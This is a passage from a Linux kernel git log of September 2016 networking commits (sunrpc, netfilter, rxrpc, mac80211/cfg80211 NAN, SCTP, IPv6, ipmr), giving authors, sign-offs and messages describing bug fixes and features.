Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-01 03:24:28 -04:00
Frank Sorenson
66cbd4ba8a sunrpc: replace generic auth_cred hash with auth-specific function
Replace the generic code to hash the auth_cred with the call to
the auth-specific hash function in the rpc_authops struct.

Signed-off-by: Frank Sorenson <sorenson@redhat.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-30 15:47:47 -04:00
Frank Sorenson
a960f8d6db sunrpc: add RPCSEC_GSS hash_cred() function
Add a hash_cred() function for RPCSEC_GSS, using only the
uid from the auth_cred.

Signed-off-by: Frank Sorenson <sorenson@redhat.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-30 15:47:13 -04:00
Frank Sorenson
1e035d065f sunrpc: add auth_unix hash_cred() function
Add a hash_cred() function for auth_unix, using both the
uid and gid from the auth_cred.

Signed-off-by: Frank Sorenson <sorenson@redhat.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-30 15:45:21 -04:00
Frank Sorenson
18028c967e sunrpc: add generic_auth hash_cred() function
Add a hash_cred() function for generic_auth, using both the
uid and gid from the auth_cred.

Signed-off-by: Frank Sorenson <sorenson@redhat.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-30 15:33:36 -04:00
Vishwanath Pai
1f827f5138 netfilter: xt_hashlimit: Fix link error in 32bit arch because of 64bit division
Division of 64bit integers will cause linker error undefined reference
to `__udivdi3'. Fix this by replacing divisions with div64_64

Fixes: 11d5f15723 ("netfilter: xt_hashlimit: Create revision 2 to ...")
Signed-off-by: Vishwanath Pai <vpai@akamai.com>
Acked-by: Maciej Żenczykowski <maze@google.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-30 20:15:27 +02:00
Aaron Conole
7816ec564e netfilter: accommodate different kconfig in nf_set_hooks_head
When CONFIG_NETFILTER_INGRESS is unset (or no), we need to handle
the request for registration properly by dropping the hook.  This
releases the entry during the set.

Fixes: e3b37f11e6 ("netfilter: replace list_head with single linked list")
Signed-off-by: Aaron Conole <aconole@bytheb.org>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-30 20:15:26 +02:00
Aaron Conole
5119e4381a netfilter: Fix potential null pointer dereference
It's possible for nf_hook_entry_head to return NULL.  If two
nf_unregister_net_hook calls happen simultaneously with a single hook
entry in the list, both will enter the nf_hook_mutex critical section.
The first will successfully delete the head, but the second will see
this NULL pointer and attempt to dereference.

This fix ensures that no null pointer dereference could occur when such
a condition happens.

Fixes: e3b37f11e6 ("netfilter: replace list_head with single linked list")
Signed-off-by: Aaron Conole <aconole@bytheb.org>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-30 20:15:26 +02:00
David Howells
405dea1deb rxrpc: Fix the call timer handling
The call timer's concept of a call timeout (of which there are three) that
is inactive is that it is the timeout has the same expiration time as the
call expiration timeout (the expiration timer is never inactive).  However,
I'm not resetting the timeouts when they expire, leading to repeated
processing of expired timeouts when other timeout events occur.

Fix this by:

 (1) Move the timer expiry detection into rxrpc_set_timer() inside the
     locked section.  This means that if a timeout is set that will expire
     immediately, we deal with it immediately.

 (2) If a timeout is at or before now then it has expired.  When an expiry
     is detected, an event is raised, the timeout is automatically
     inactivated and the event processor is queued.

 (3) If a timeout is at or after the expiry timeout then it is inactive.
     Inactive timeouts do not contribute to the timer setting.

 (4) The call timer callback can now just call rxrpc_set_timer() to handle
     things.

 (5) The call processor work function now checks the event flags rather
     than checking the timeouts directly.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-30 14:40:11 +01:00
David Howells
df0adc788a rxrpc: Keep the call timeouts as ktimes rather than jiffies
Keep that call timeouts as ktimes rather than jiffies so that they can be
expressed as functions of RTT.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-30 14:40:11 +01:00
David Howells
c31410ea00 rxrpc: Remove error from struct rxrpc_skb_priv as it is unused
Remove error from struct rxrpc_skb_priv as it is no longer used.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-30 14:39:32 +01:00
David Howells
775e5b71db rxrpc: The offset field in struct rxrpc_skb_priv is unnecessary
The offset field in struct rxrpc_skb_priv is unnecessary as the value can
always be calculated.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-30 14:39:28 +01:00
David Howells
0851115090 rxrpc: Reduce ssthresh to peer's receive window
When we receive an ACK from the peer that tells us what the peer's receive
window (rwind) is, we should reduce ssthresh to rwind if rwind is smaller
than ssthresh.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-30 14:38:59 +01:00
David Howells
8782def204 rxrpc: Switch to Congestion Avoidance mode at cwnd==ssthresh
Switch to Congestion Avoidance mode at cwnd == ssthresh rather than relying
on cwnd getting incremented beyond ssthresh and the window size, the mode
being shifted and then cwnd being corrected.

We need to make sure we switch into CA mode so that we stop marking every
packet for ACK.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-30 14:38:56 +01:00
Toke Høiland-Jørgensen
bb42f2d13f mac80211: Move reorder-sensitive TX handlers to after TXQ dequeue
The TXQ intermediate queues can cause packet reordering when more than
one flow is active to a single station. Since some of the wifi-specific
packet handling (notably sequence number and encryption handling) is
sensitive to re-ordering, things break if they are applied before the
TXQ.

This splits up the TX handlers and fast_xmit logic into two parts: An
early part and a late part. The former is applied before TXQ enqueue,
and the latter after dequeue. The non-TXQ path just applies both parts
at once.

Because fragments shouldn't be split up or reordered, the fragmentation
handler is run after dequeue. Any fragments are then kept in the TXQ and
on subsequent dequeues they take precedence over dequeueing from the FQ
structure.

This approach avoids having to scatter special cases all over the place
for when TXQ is enabled, at the cost of making the fast_xmit and TX
handler code slightly more complex.

Signed-off-by: Toke Høiland-Jørgensen <toke@toke.dk>
[fix a few code-style nits, make ieee80211_xmit_fast_finish void,
 remove a useless txq->sta check]
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-30 14:46:57 +02:00
Pedersen, Thomas
3a53731df7 mac80211: mesh: decrease max drift
The old value was 30ms, which means mesh sync will treat
any value below as merely TSF drift. This isn't really
reasonable (typical drift is < 10us/s) since people
probably want to adjust TSF in smaller increments (for ie.
beacon collision avoidance) without mesh sync fighting
back.

Change max drift adjustment to 0.8ms, so manual TSF
adjustments can be made in 1ms increments, with some
margin.

Signed-off-by: Thomas Pedersen <twp@qca.qualcomm.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-30 13:47:00 +02:00
Pedersen, Thomas
354d381baf mac80211: add offset_tsf driver op and use it for mesh
This allows the mesh sync (and debugfs) code to make incremental
TSF adjustments, avoiding any uncertainty introduced by delay in
programming absolute TSF.

Signed-off-by: Thomas Pedersen <twp@qca.qualcomm.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-30 13:45:44 +02:00
Toke Høiland-Jørgensen
3ff23cd565 mac80211: Set lower memory limit for non-VHT devices
Small devices can run out of memory from queueing too many packets. If
VHT is not supported by the PHY, having more than 4 MBytes of total
queue in the TXQ intermediate queues is not needed, and so we can safely
limit the memory usage in these cases and avoid OOM.

Signed-off-by: Toke Høiland-Jørgensen <toke@toke.dk>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-30 13:33:33 +02:00
Toke Høiland-Jørgensen
2a4e675d88 mac80211: Export fq memory limit information in debugfs
Add memory limit, usage and overlimit counter to per-PHY 'aqm' debugfs
file.

Signed-off-by: Toke Høiland-Jørgensen <toke@toke.dk>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-30 13:29:31 +02:00
Ayala Beker
92bc43bce2 mac80211: Add API to report NAN function match
Provide an API to report NAN function match. Mac80211 will lookup the
corresponding cookie and report the match to cfg80211.

Signed-off-by: Andrei Otcheretianski <andrei.otcheretianski@intel.com>
Signed-off-by: Emmanuel Grumbach <emmanuel.grumbach@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-30 13:21:57 +02:00
Ayala Beker
167e33f4f6 mac80211: Implement add_nan_func and rm_nan_func
Implement add/rm_nan_func functions and handle NAN function
termination notifications. Handle instance_id allocation for
NAN functions and implement the reconfig flow.

Signed-off-by: Andrei Otcheretianski <andrei.otcheretianski@intel.com>
Signed-off-by: Emmanuel Grumbach <emmanuel.grumbach@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-30 13:21:52 +02:00
Ayala Beker
5953ff6d6a mac80211: implement nan_change_conf
Implement nan_change_conf callback which allows to change current
NAN configuration (master preference and dual band operation).
Store the current NAN configuration in sdata, so it can be used
both to provide the driver the updated configuration with changes
and also it will be used in hw reconfig flows in next patches.

Signed-off-by: Andrei Otcheretianski <andrei.otcheretianski@intel.com>
Signed-off-by: Emmanuel Grumbach <emmanuel.grumbach@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-30 13:21:43 +02:00
Ayala Beker
368e5a7b4e cfg80211: Provide an API to report NAN function termination
Provide a function that reports NAN DE function termination. The function
may be terminated due to one of the following reasons: user request,
ttl expiration or failure.
If the NAN instance is tied to the owner, the notification will be
sent to the socket that started the NAN interface only

Signed-off-by: Andrei Otcheretianski <andrei.otcheretianski@intel.com>
Signed-off-by: Emmanuel Grumbach <emmanuel.grumbach@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-30 13:21:37 +02:00
Ayala Beker
50bcd31d99 cfg80211: provide a function to report a match for NAN
Provide a function the driver can call to report a match.
This will send the event to the user space.
If the NAN instance is tied to the owner, the notifications will be
sent to the socket that started the NAN interface only.

Signed-off-by: Andrei Otcheretianski <andrei.otcheretianski@intel.com>
Signed-off-by: Emmanuel Grumbach <emmanuel.grumbach@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-30 13:21:32 +02:00
Ayala Beker
a5a9dcf291 cfg80211: allow the user space to change current NAN configuration
Some NAN configuration paramaters may change during the operation of
the NAN device. For example, a user may want to update master preference
value when the device gets plugged/unplugged to the power.
Add API that allows to do so.

Signed-off-by: Andrei Otcheretianski <andrei.otcheretianski@intel.com>
Signed-off-by: Emmanuel Grumbach <emmanuel.grumbach@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-30 13:21:28 +02:00
Ayala Beker
a442b761b2 cfg80211: add add_nan_func / del_nan_func
A NAN function can be either publish, subscribe or follow
up. Make all the necessary verifications and just pass the
request to the driver.
Allow the user space application that starts NAN to
forbid any other socket to add or remove functions.

Signed-off-by: Andrei Otcheretianski <andrei.otcheretianski@intel.com>
Signed-off-by: Emmanuel Grumbach <emmanuel.grumbach@intel.com>
Signed-off-by: Ayala Beker <ayala.beker@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-30 13:21:23 +02:00
Ayala Beker
708d50edb1 mac80211: add boilerplate code for start / stop NAN
This code doesn't do much besides allowing to start and
stop the vif.

Signed-off-by: Andrei Otcheretianski <andrei.otcheretianski@intel.com>
Signed-off-by: Emmanuel Grumbach <emmanuel.grumbach@intel.com>
Signed-off-by: Ayala Beker <ayala.beker@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-30 13:21:19 +02:00
Ayala Beker
cb3b7d8765 cfg80211: add start / stop NAN commands
This allows user space to start/stop NAN interface.
A NAN interface is like P2P device in a few aspects: it
doesn't have a netdev associated to it.
Add the new interface type and prevent operations that
can't be executed on NAN interface like scan.

Define several attributes that may be configured by user space
when starting NAN functionality (master preference and dual
band operation)

Signed-off-by: Andrei Otcheretianski <andrei.otcheretianski@intel.com>
Signed-off-by: Emmanuel Grumbach <emmanuel.grumbach@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-30 13:21:14 +02:00
David Spinadel
b8676221f0 cfg80211: Add support for static WEP in the driver
Add support for drivers that implement static WEP internally, i.e.
expose connection keys to the driver in connect flow and don't
upload the keys after the connection.

Signed-off-by: David Spinadel <david.spinadel@intel.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-30 13:19:10 +02:00
Toke Høiland-Jørgensen
e0e2effff5 mac80211: Move ieee802111_tx_dequeue() to later in tx.c
The TXQ path restructure requires ieee80211_tx_dequeue() to call TX
handlers and parts of the xmit_fast path. Move the function to later in
tx.c in preparation for this.

Signed-off-by: Toke Høiland-Jørgensen <toke@toke.dk>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-30 13:12:48 +02:00
Florian Westphal
2258d927a6 xfrm: remove unused helper
Not used anymore since 2009 (9e0d57fd6d,
'xfrm: SAD entries do not expire correctly after suspend-resume').

Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: Steffen Klassert <steffen.klassert@secunet.com>
2016-09-30 08:20:56 +02:00
Xin Long
1cceda7849 sctp: fix the issue sctp_diag uses lock_sock in rcu_read_lock
When sctp dumps all the ep->assocs, it needs to lock_sock first,
but now it locks sock in rcu_read_lock, and lock_sock may sleep,
which would break rcu_read_lock.

This patch is to get and hold one sock when traversing the list.
After that and get out of rcu_read_lock, lock and dump it. Then
it will traverse the list again to get the next one until all
sctp socks are dumped.

For sctp_diag_dump_one, it fixes this issue by holding asoc and
moving cb() out of rcu_read_lock in sctp_transport_lookup_process.

Fixes: 8f840e47f1 ("sctp: add the sctp_diag.c file")
Signed-off-by: Xin Long <lucien.xin@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30 02:08:57 -04:00
Xin Long
be4947bf46 sctp: change to check peer prsctp_capable when using prsctp polices
Now before using prsctp polices, sctp uses asoc->prsctp_enable to
check if prsctp is enabled. However asoc->prsctp_enable is set only
means local host support prsctp, sctp should not abandon packet if
peer host doesn't enable prsctp.

So this patch is to use asoc->peer.prsctp_capable to check if prsctp
is enabled on both side, instead of asoc->prsctp_enable, as asoc's
peer.prsctp_capable is set only when local and peer both enable prsctp.

Fixes: a6c2f79287 ("sctp: implement prsctp TTL policy")
Signed-off-by: Xin Long <lucien.xin@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30 02:07:05 -04:00
Xin Long
0605483f6a sctp: remove prsctp_param from sctp_chunk
Now sctp uses chunk->prsctp_param to save the prsctp param for all the
prsctp polices, we didn't need to introduce prsctp_param to sctp_chunk.
We can just use chunk->sinfo.sinfo_timetolive for RTX and BUF polices,
and reuse msg->expires_at for TTL policy, as the prsctp polices and old
expires policy are mutual exclusive.

This patch is to remove prsctp_param from sctp_chunk, and reuse msg's
expires_at for TTL and chunk's sinfo.sinfo_timetolive for RTX and BUF
polices.

Note that sctp can't use chunk's sinfo.sinfo_timetolive for TTL policy,
as it needs a u64 variables to save the expires_at time.

This one also fixes the "netperf-Throughput_Mbps -37.2% regression"
issue.

Fixes: a6c2f79287 ("sctp: implement prsctp TTL policy")
Signed-off-by: Xin Long <lucien.xin@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30 02:07:05 -04:00
Maciej Żenczykowski
bd11f0741f ipv6 addrconf: implement RFC7559 router solicitation backoff
This implements:
  https://tools.ietf.org/html/rfc7559

Backoff is performed according to RFC3315 section 14:
  https://tools.ietf.org/html/rfc3315#section-14

We allow setting /proc/sys/net/ipv6/conf/*/router_solicitations
to a negative value meaning an unlimited number of retransmits,
and we make this the new default (inline with the RFC).

We also add a new setting:
  /proc/sys/net/ipv6/conf/*/router_solicitation_max_interval
defaulting to 1 hour (per RFC recommendation).

Signed-off-by: Maciej Żenczykowski <maze@google.com>
Acked-by: Erik Kline <ek@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30 01:54:28 -04:00
Jia He
6d4a741cbb net: Suppress the "Comparison to NULL could be written" warnings
This is to suppress the checkpatch.pl warning "Comparison to NULL
could be written". No functional changes here.

Signed-off-by: Jia He <hejianet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30 01:50:45 -04:00
Jia He
aca05671d5 ipv6: Remove useless parameter in __snmp6_fill_statsdev
The parameter items(is always ICMP6_MIB_MAX) is useless for __snmp6_fill_statsdev

Signed-off-by: Jia He <hejianet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30 01:50:45 -04:00
Jia He
07613873f1 proc: Reduce cache miss in xfrm_statistics_seq_show
This is to use the generic interfaces snmp_get_cpu_field{,64}_batch to
aggregate the data by going through all the items of each cpu sequentially.

Signed-off-by: Jia He <hejianet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30 01:50:45 -04:00
Jia He
7d64a94be2 proc: Reduce cache miss in sctp_snmp_seq_show
This is to use the generic interfaces snmp_get_cpu_field{,64}_batch to
aggregate the data by going through all the items of each cpu sequentially.

Signed-off-by: Jia He <hejianet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30 01:50:44 -04:00
Jia He
4a4857b1c8 proc: Reduce cache miss in snmp6_seq_show
This is to use the generic interfaces snmp_get_cpu_field{,64}_batch to
aggregate the data by going through all the items of each cpu sequentially.

Signed-off-by: Jia He <hejianet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30 01:50:44 -04:00
Jia He
f22d5c4909 proc: Reduce cache miss in snmp_seq_show
This is to use the generic interfaces snmp_get_cpu_field{,64}_batch to
aggregate the data by going through all the items of each cpu sequentially.
Then snmp_seq_show is split into 2 parts to avoid build warning "the frame
size" larger than 1024.

Signed-off-by: Jia He <hejianet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-30 01:50:44 -04:00
David Howells
ed1e8679d8 rxrpc: Note serial number being ACK'd in the congestion management trace
Note the serial number of the packet being ACK'd in the congestion
management trace rather than the serial number of the ACK packet.  Whilst
the serial number of the ACK packet is useful for matching ACK packet in
the output of wireshark, the serial number that the ACK is in response to
is of more use in working out how different trace lines relate.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-29 22:57:47 +01:00
David Howells
b112a67081 rxrpc: Request more ACKs in slow-start mode
Set the request-ACK on more DATA packets whilst we're in slow start mode so
that we get sufficient ACKs back to supply information to configure the
window.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-29 22:57:47 +01:00
David Howells
1e9e5c9521 rxrpc: Reduce the rxrpc_local::services list to a pointer
Reduce the rxrpc_local::services list to just a pointer as we don't permit
multiple service endpoints to bind to a single transport endpoints (this is
excluded by rxrpc_lookup_local()).

The reason we don't allow this is that if you send a request to an AFS
filesystem service, it will try to talk back to your cache manager on the
port you sent from (this is how file change notifications are handled).  To
prevent someone from stealing your CM callbacks, we don't let AF_RXRPC
sockets share a UDP socket if at least one of them has a service bound.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-29 22:57:47 +01:00
David Howells
2629c7fa7c rxrpc: When activating client conn channels, do state check inside lock
In rxrpc_activate_channels(), the connection cache state is checked outside
of the lock, which means it can change whilst we're waking calls up,
thereby changing whether or not we're allowed to wake calls up.

Fix this by moving the check inside the locked region.  The check to see if
all the channels are currently busy can stay outside of the locked region.

Whilst we're at it:

 (1) Split the locked section out into its own function so that we can call
     it from other places in a later patch.

 (2) Determine the mask of channels dependent on the state as we're going
     to add another state in a later patch that will restrict the number of
     simultaneous calls to 1 on a connection.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-29 22:57:47 +01:00
David Howells
a1767077b0 rxrpc: Make Tx loss-injection go through normal return and adjust tracing
In rxrpc_send_data_packet() make the loss-injection path return through the
same code as the transmission path so that the RTT determination is
initiated and any future timer shuffling will be done, despite the packet
having been binned.

Whilst we're at it:

 (1) Add to the tx_data tracepoint an indication of whether or not we're
     retransmitting a data packet.

 (2) When we're deciding whether or not to request an ACK, rather than
     checking if we're in fast-retransmit mode check instead if we're
     retransmitting.

 (3) Don't invoke the lose_skb tracepoint when losing a Tx packet as we're
     not altering the sk_buff refcount nor are we just seeing it after
     getting it off the Tx list.

 (4) The rxrpc_skb_tx_lost note is then no longer used so remove it.

 (5) rxrpc_lose_skb() no longer needs to deal with rxrpc_skb_tx_lost.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-29 22:37:15 +01:00
David Howells
8732db67c6 rxrpc: Fix exclusive client connections
Exclusive connections are currently reusable (which they shouldn't be)
because rxrpc_alloc_client_connection() checks the exclusive flag in the
rxrpc_connection struct before it's initialised from the function
parameters.  This means that the DONT_REUSE flag doesn't get set.

Fix this by checking the function parameters for the exclusive flag.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-29 22:37:15 +01:00
Eric Dumazet
7836667cec net: do not export sk_stream_write_space
Since commit 900f65d361 ("tcp: move duplicate code from
tcp_v4_init_sock()/tcp_v6_init_sock()") we no longer need
to export sk_stream_write_space()

From: Eric Dumazet <edumazet@google.com>
Cc: Neal Cardwell <ncardwell@google.com>

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-28 20:32:38 -04:00
Johannes Berg
8f7d99ba85 cfg80211: wext: really don't store non-WEP keys
Jouni reported that during (repeated) wext_pmf test runs (from the
wpa_supplicant hwsim test suite) the kernel crashes. The reason is
that after the key is set, the wext code still unnecessarily stores
it into the key cache. Despite smatch pointing out an overflow, I
failed to identify the possibility for this in the code and missed
it during development of the earlier patch series.

In order to fix this, simply check that we never store anything but
WEP keys into the cache, adding a comment as to why that's enough.

Also, since the cache is still allocated early even if it won't be
used in many cases, add a comment explaining why - otherwise we'd
have to roll back key settings to the driver in case of allocation
failures, which is far more difficult.

Fixes: 89b706fb28 ("cfg80211: reduce connect key caching struct size")
Reported-by: Jouni Malinen <j@w1.fi>
Bisected-by: Jouni Malinen <j@w1.fi>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-28 23:55:23 +02:00
Lawrence Brakmo
3acf3ec3f4 tcp: Change txhash on every SYN and RTO retransmit
The current code changes txhash (flowlables) on every retransmitted
SYN/ACK, but only after the 2nd retransmitted SYN and only after
tcp_retries1 RTO retransmits.

With this patch:
1) txhash is changed with every SYN retransmits
2) txhash is changed with every RTO.

The result is that we can start re-routing around failed (or very
congested paths) as soon as possible. Otherwise application health
checks may fail and the connection may be terminated before we start
to change txhash.

v4: Removed sysctl, txhash is changed for all RTOs
v3: Removed text saying default value of sysctl is 0 (it is 100)
v2: Added sysctl documentation and cleaned code

Tested with packetdrill tests

Signed-off-by: Lawrence Brakmo <brakmo@fb.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-28 07:52:34 -04:00
Jiri Pirko
347e3b28c1 switchdev: remove FIB offload infrastructure
Since this is now taken care of by FIB notifier, remove the code, with
all unused dependencies.

Signed-off-by: Jiri Pirko <jiri@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-28 04:48:00 -04:00
Jiri Pirko
c98501879b fib: introduce FIB info offload flag helpers
These helpers are to be used in case someone offloads the FIB entry. The
result is that if the entry is offloaded to at least one device, the
offload flag is set.

Signed-off-by: Jiri Pirko <jiri@mellanox.com>
Reviewed-by: Ido Schimmel <idosch@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-28 04:48:00 -04:00
Jiri Pirko
b90eb75494 fib: introduce FIB notification infrastructure
This allows to pass information about added/deleted FIB entries/rules to
whoever is interested. This is done in a very similar way as devinet
notifies address additions/removals.

Signed-off-by: Jiri Pirko <jiri@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-28 04:48:00 -04:00
Hadar Hen Zion
eb523f42d7 net/sched: cls_flower: Use a proper mask value for enc key id parameter
The current code use the encapsulation key id value as the mask of that
parameter which is wrong. Fix that by using a full mask.

Fixes: bc3103f1ed ('net/sched: cls_flower: Classify packet in ip tunnels')
Signed-off-by: Hadar Hen Zion <hadarh@mellanox.com>
Acked-by: Amir Vadai <amir@vadai.me>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-28 03:11:22 -04:00
Deepa Dinamani
078cd8279e fs: Replace CURRENT_TIME with current_time() for inode timestamps
CURRENT_TIME macro is not appropriate for filesystems as it
doesn't use the right granularity for filesystem timestamps.
Use current_time() instead.

CURRENT_TIME is also not y2038 safe.

This is also in preparation for the patch that transitions
vfs timestamps to use 64 bit time and hence make them
y2038 safe. As part of the effort current_time() will be
extended to do range checks. Hence, it is necessary for all
file system timestamps to use current_time(). Also,
current_time() will be transitioned along with vfs to be
y2038 safe.

Note that whenever a single call to current_time() is used
to change timestamps in different inodes, it is because they
share the same time granularity.

Signed-off-by: Deepa Dinamani <deepa.kernel@gmail.com>
Reviewed-by: Arnd Bergmann <arnd@arndb.de>
Acked-by: Felipe Balbi <balbi@kernel.org>
Acked-by: Steven Whitehouse <swhiteho@redhat.com>
Acked-by: Ryusuke Konishi <konishi.ryusuke@lab.ntt.co.jp>
Acked-by: David Sterba <dsterba@suse.com>
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
2016-09-27 21:06:21 -04:00
Ke Wang
77b00bc037 sunrpc: queue work on system_power_efficient_wq
sunrpc uses workqueue to clean cache regulary. There is no real dependency
of executing work on the cpu which queueing it.

On a idle system, especially for a heterogeneous systems like big.LITTLE,
it is observed that the big idle cpu was woke up many times just to service
this work, which against the principle of power saving. It would be better
if we can schedule it on a cpu which the scheduler believes to be the most
appropriate one.

After apply this patch, system_wq will be replaced by
system_power_efficient_wq for sunrpc. This functionality is enabled when
CONFIG_WQ_POWER_EFFICIENT is selected.

Signed-off-by: Ke Wang <ke.wang@spreadtrum.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-27 14:35:36 -04:00
Yotam Gigi
c006da0be0 act_ife: Fix false encoding
On ife encode side, the action stores the different tlvs inside the ife
header, where each tlv length field should refer to the length of the
whole tlv (without additional padding) and not just the data length.

On ife decode side, the action iterates over the tlvs in the ife header
and parses them one by one, where in each iteration the current pointer is
advanced according to the tlv size.

Before, the encoding encoded only the data length inside the tlv, which led
to false parsing of ife the header. In addition, due to the fact that the
loop counter was unsigned, it could lead to infinite parsing loop.

This fix changes the loop counter to be signed and fixes the encoding to
take into account the tlv type and size.

Fixes: 28a10c426e ("net sched: fix encoding to use real length")
Acked-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: Yotam Gigi <yotamg@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-27 09:53:17 -04:00
Yotam Gigi
4b1d488a28 act_ife: Fix external mac header on encode
On ife encode side, external mac header is copied from the original packet
and may be overridden if the user requests. Before, the mac header copy
was done from memory region that might not be accessible anymore, as
skb_cow_head might free it and copy the packet. This led to random values
in the external mac header once the values were not set by user.

This fix takes the internal mac header from the packet, after the call to
skb_cow_head.

Fixes: ef6980b6be ("net sched: introduce IFE action")
Acked-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: Yotam Gigi <yotamg@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-27 09:53:16 -04:00
Jorgen Hansen
1190cfdb1a VSOCK: Don't dec ack backlog twice for rejected connections
If a pending socket is marked as rejected, we will decrease the
sk_ack_backlog twice. So don't decrement it for rejected sockets
in vsock_pending_work().

Testing of the rejected socket path was done through code
modifications.

Reported-by: Stefan Hajnoczi <stefanha@redhat.com>
Signed-off-by: Jorgen Hansen <jhansen@vmware.com>
Reviewed-by: Adit Ranadive <aditr@vmware.com>
Reviewed-by: Aditya Sarwade <asarwade@vmware.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-27 07:59:25 -04:00
Johannes Berg
8564e38206 cfg80211: add checks for beacon rate, extend to mesh
The previous commit added support for specifying the beacon rate
for AP mode. Add features checks to this, and extend it to also
support the rate configuration for mesh networks. For IBSS it's
not as simple due to joining etc., so that's not yet supported.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-26 10:23:48 +02:00
Purushottam Kushwaha
a7c7fbff6a cfg80211: Add support to configure a beacon data rate
This allows an option to configure a single beacon tx rate for an AP.

Signed-off-by: Purushottam Kushwaha <pkushwah@qti.qualcomm.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-26 10:23:48 +02:00
David S. Miller
71527eb2be Merge branch 'for-upstream' of git://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth-next
Johan Hedberg says:

====================
pull request: bluetooth-next 2016-09-25

Here are a few more Bluetooth & 802.15.4 patches for the 4.9 kernel that
have popped up during the past week:

 - New USB ID for QCA_ROME Bluetooth device
 - NULL pointer dereference fix for Bluetooth mgmt sockets
 - Fixes for BCSP driver
 - Fix for updating LE scan response

Please let me know if there are any issues pulling. Thanks.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-25 23:52:22 -04:00
Nikolay Aleksandrov
2cf750704b ipmr, ip6mr: fix scheduling while atomic and a deadlock with ipmr_get_route
Since the commit below the ipmr/ip6mr rtnl_unicast() code uses the portid
instead of the previous dst_pid which was copied from in_skb's portid.
Since the skb is new the portid is 0 at that point so the packets are sent
to the kernel and we get scheduling while atomic or a deadlock (depending
on where it happens) by trying to acquire rtnl two times.
Also since this is RTM_GETROUTE, it can be triggered by a normal user.

Here's the sleeping while atomic trace:
[ 7858.212557] BUG: sleeping function called from invalid context at kernel/locking/mutex.c:620
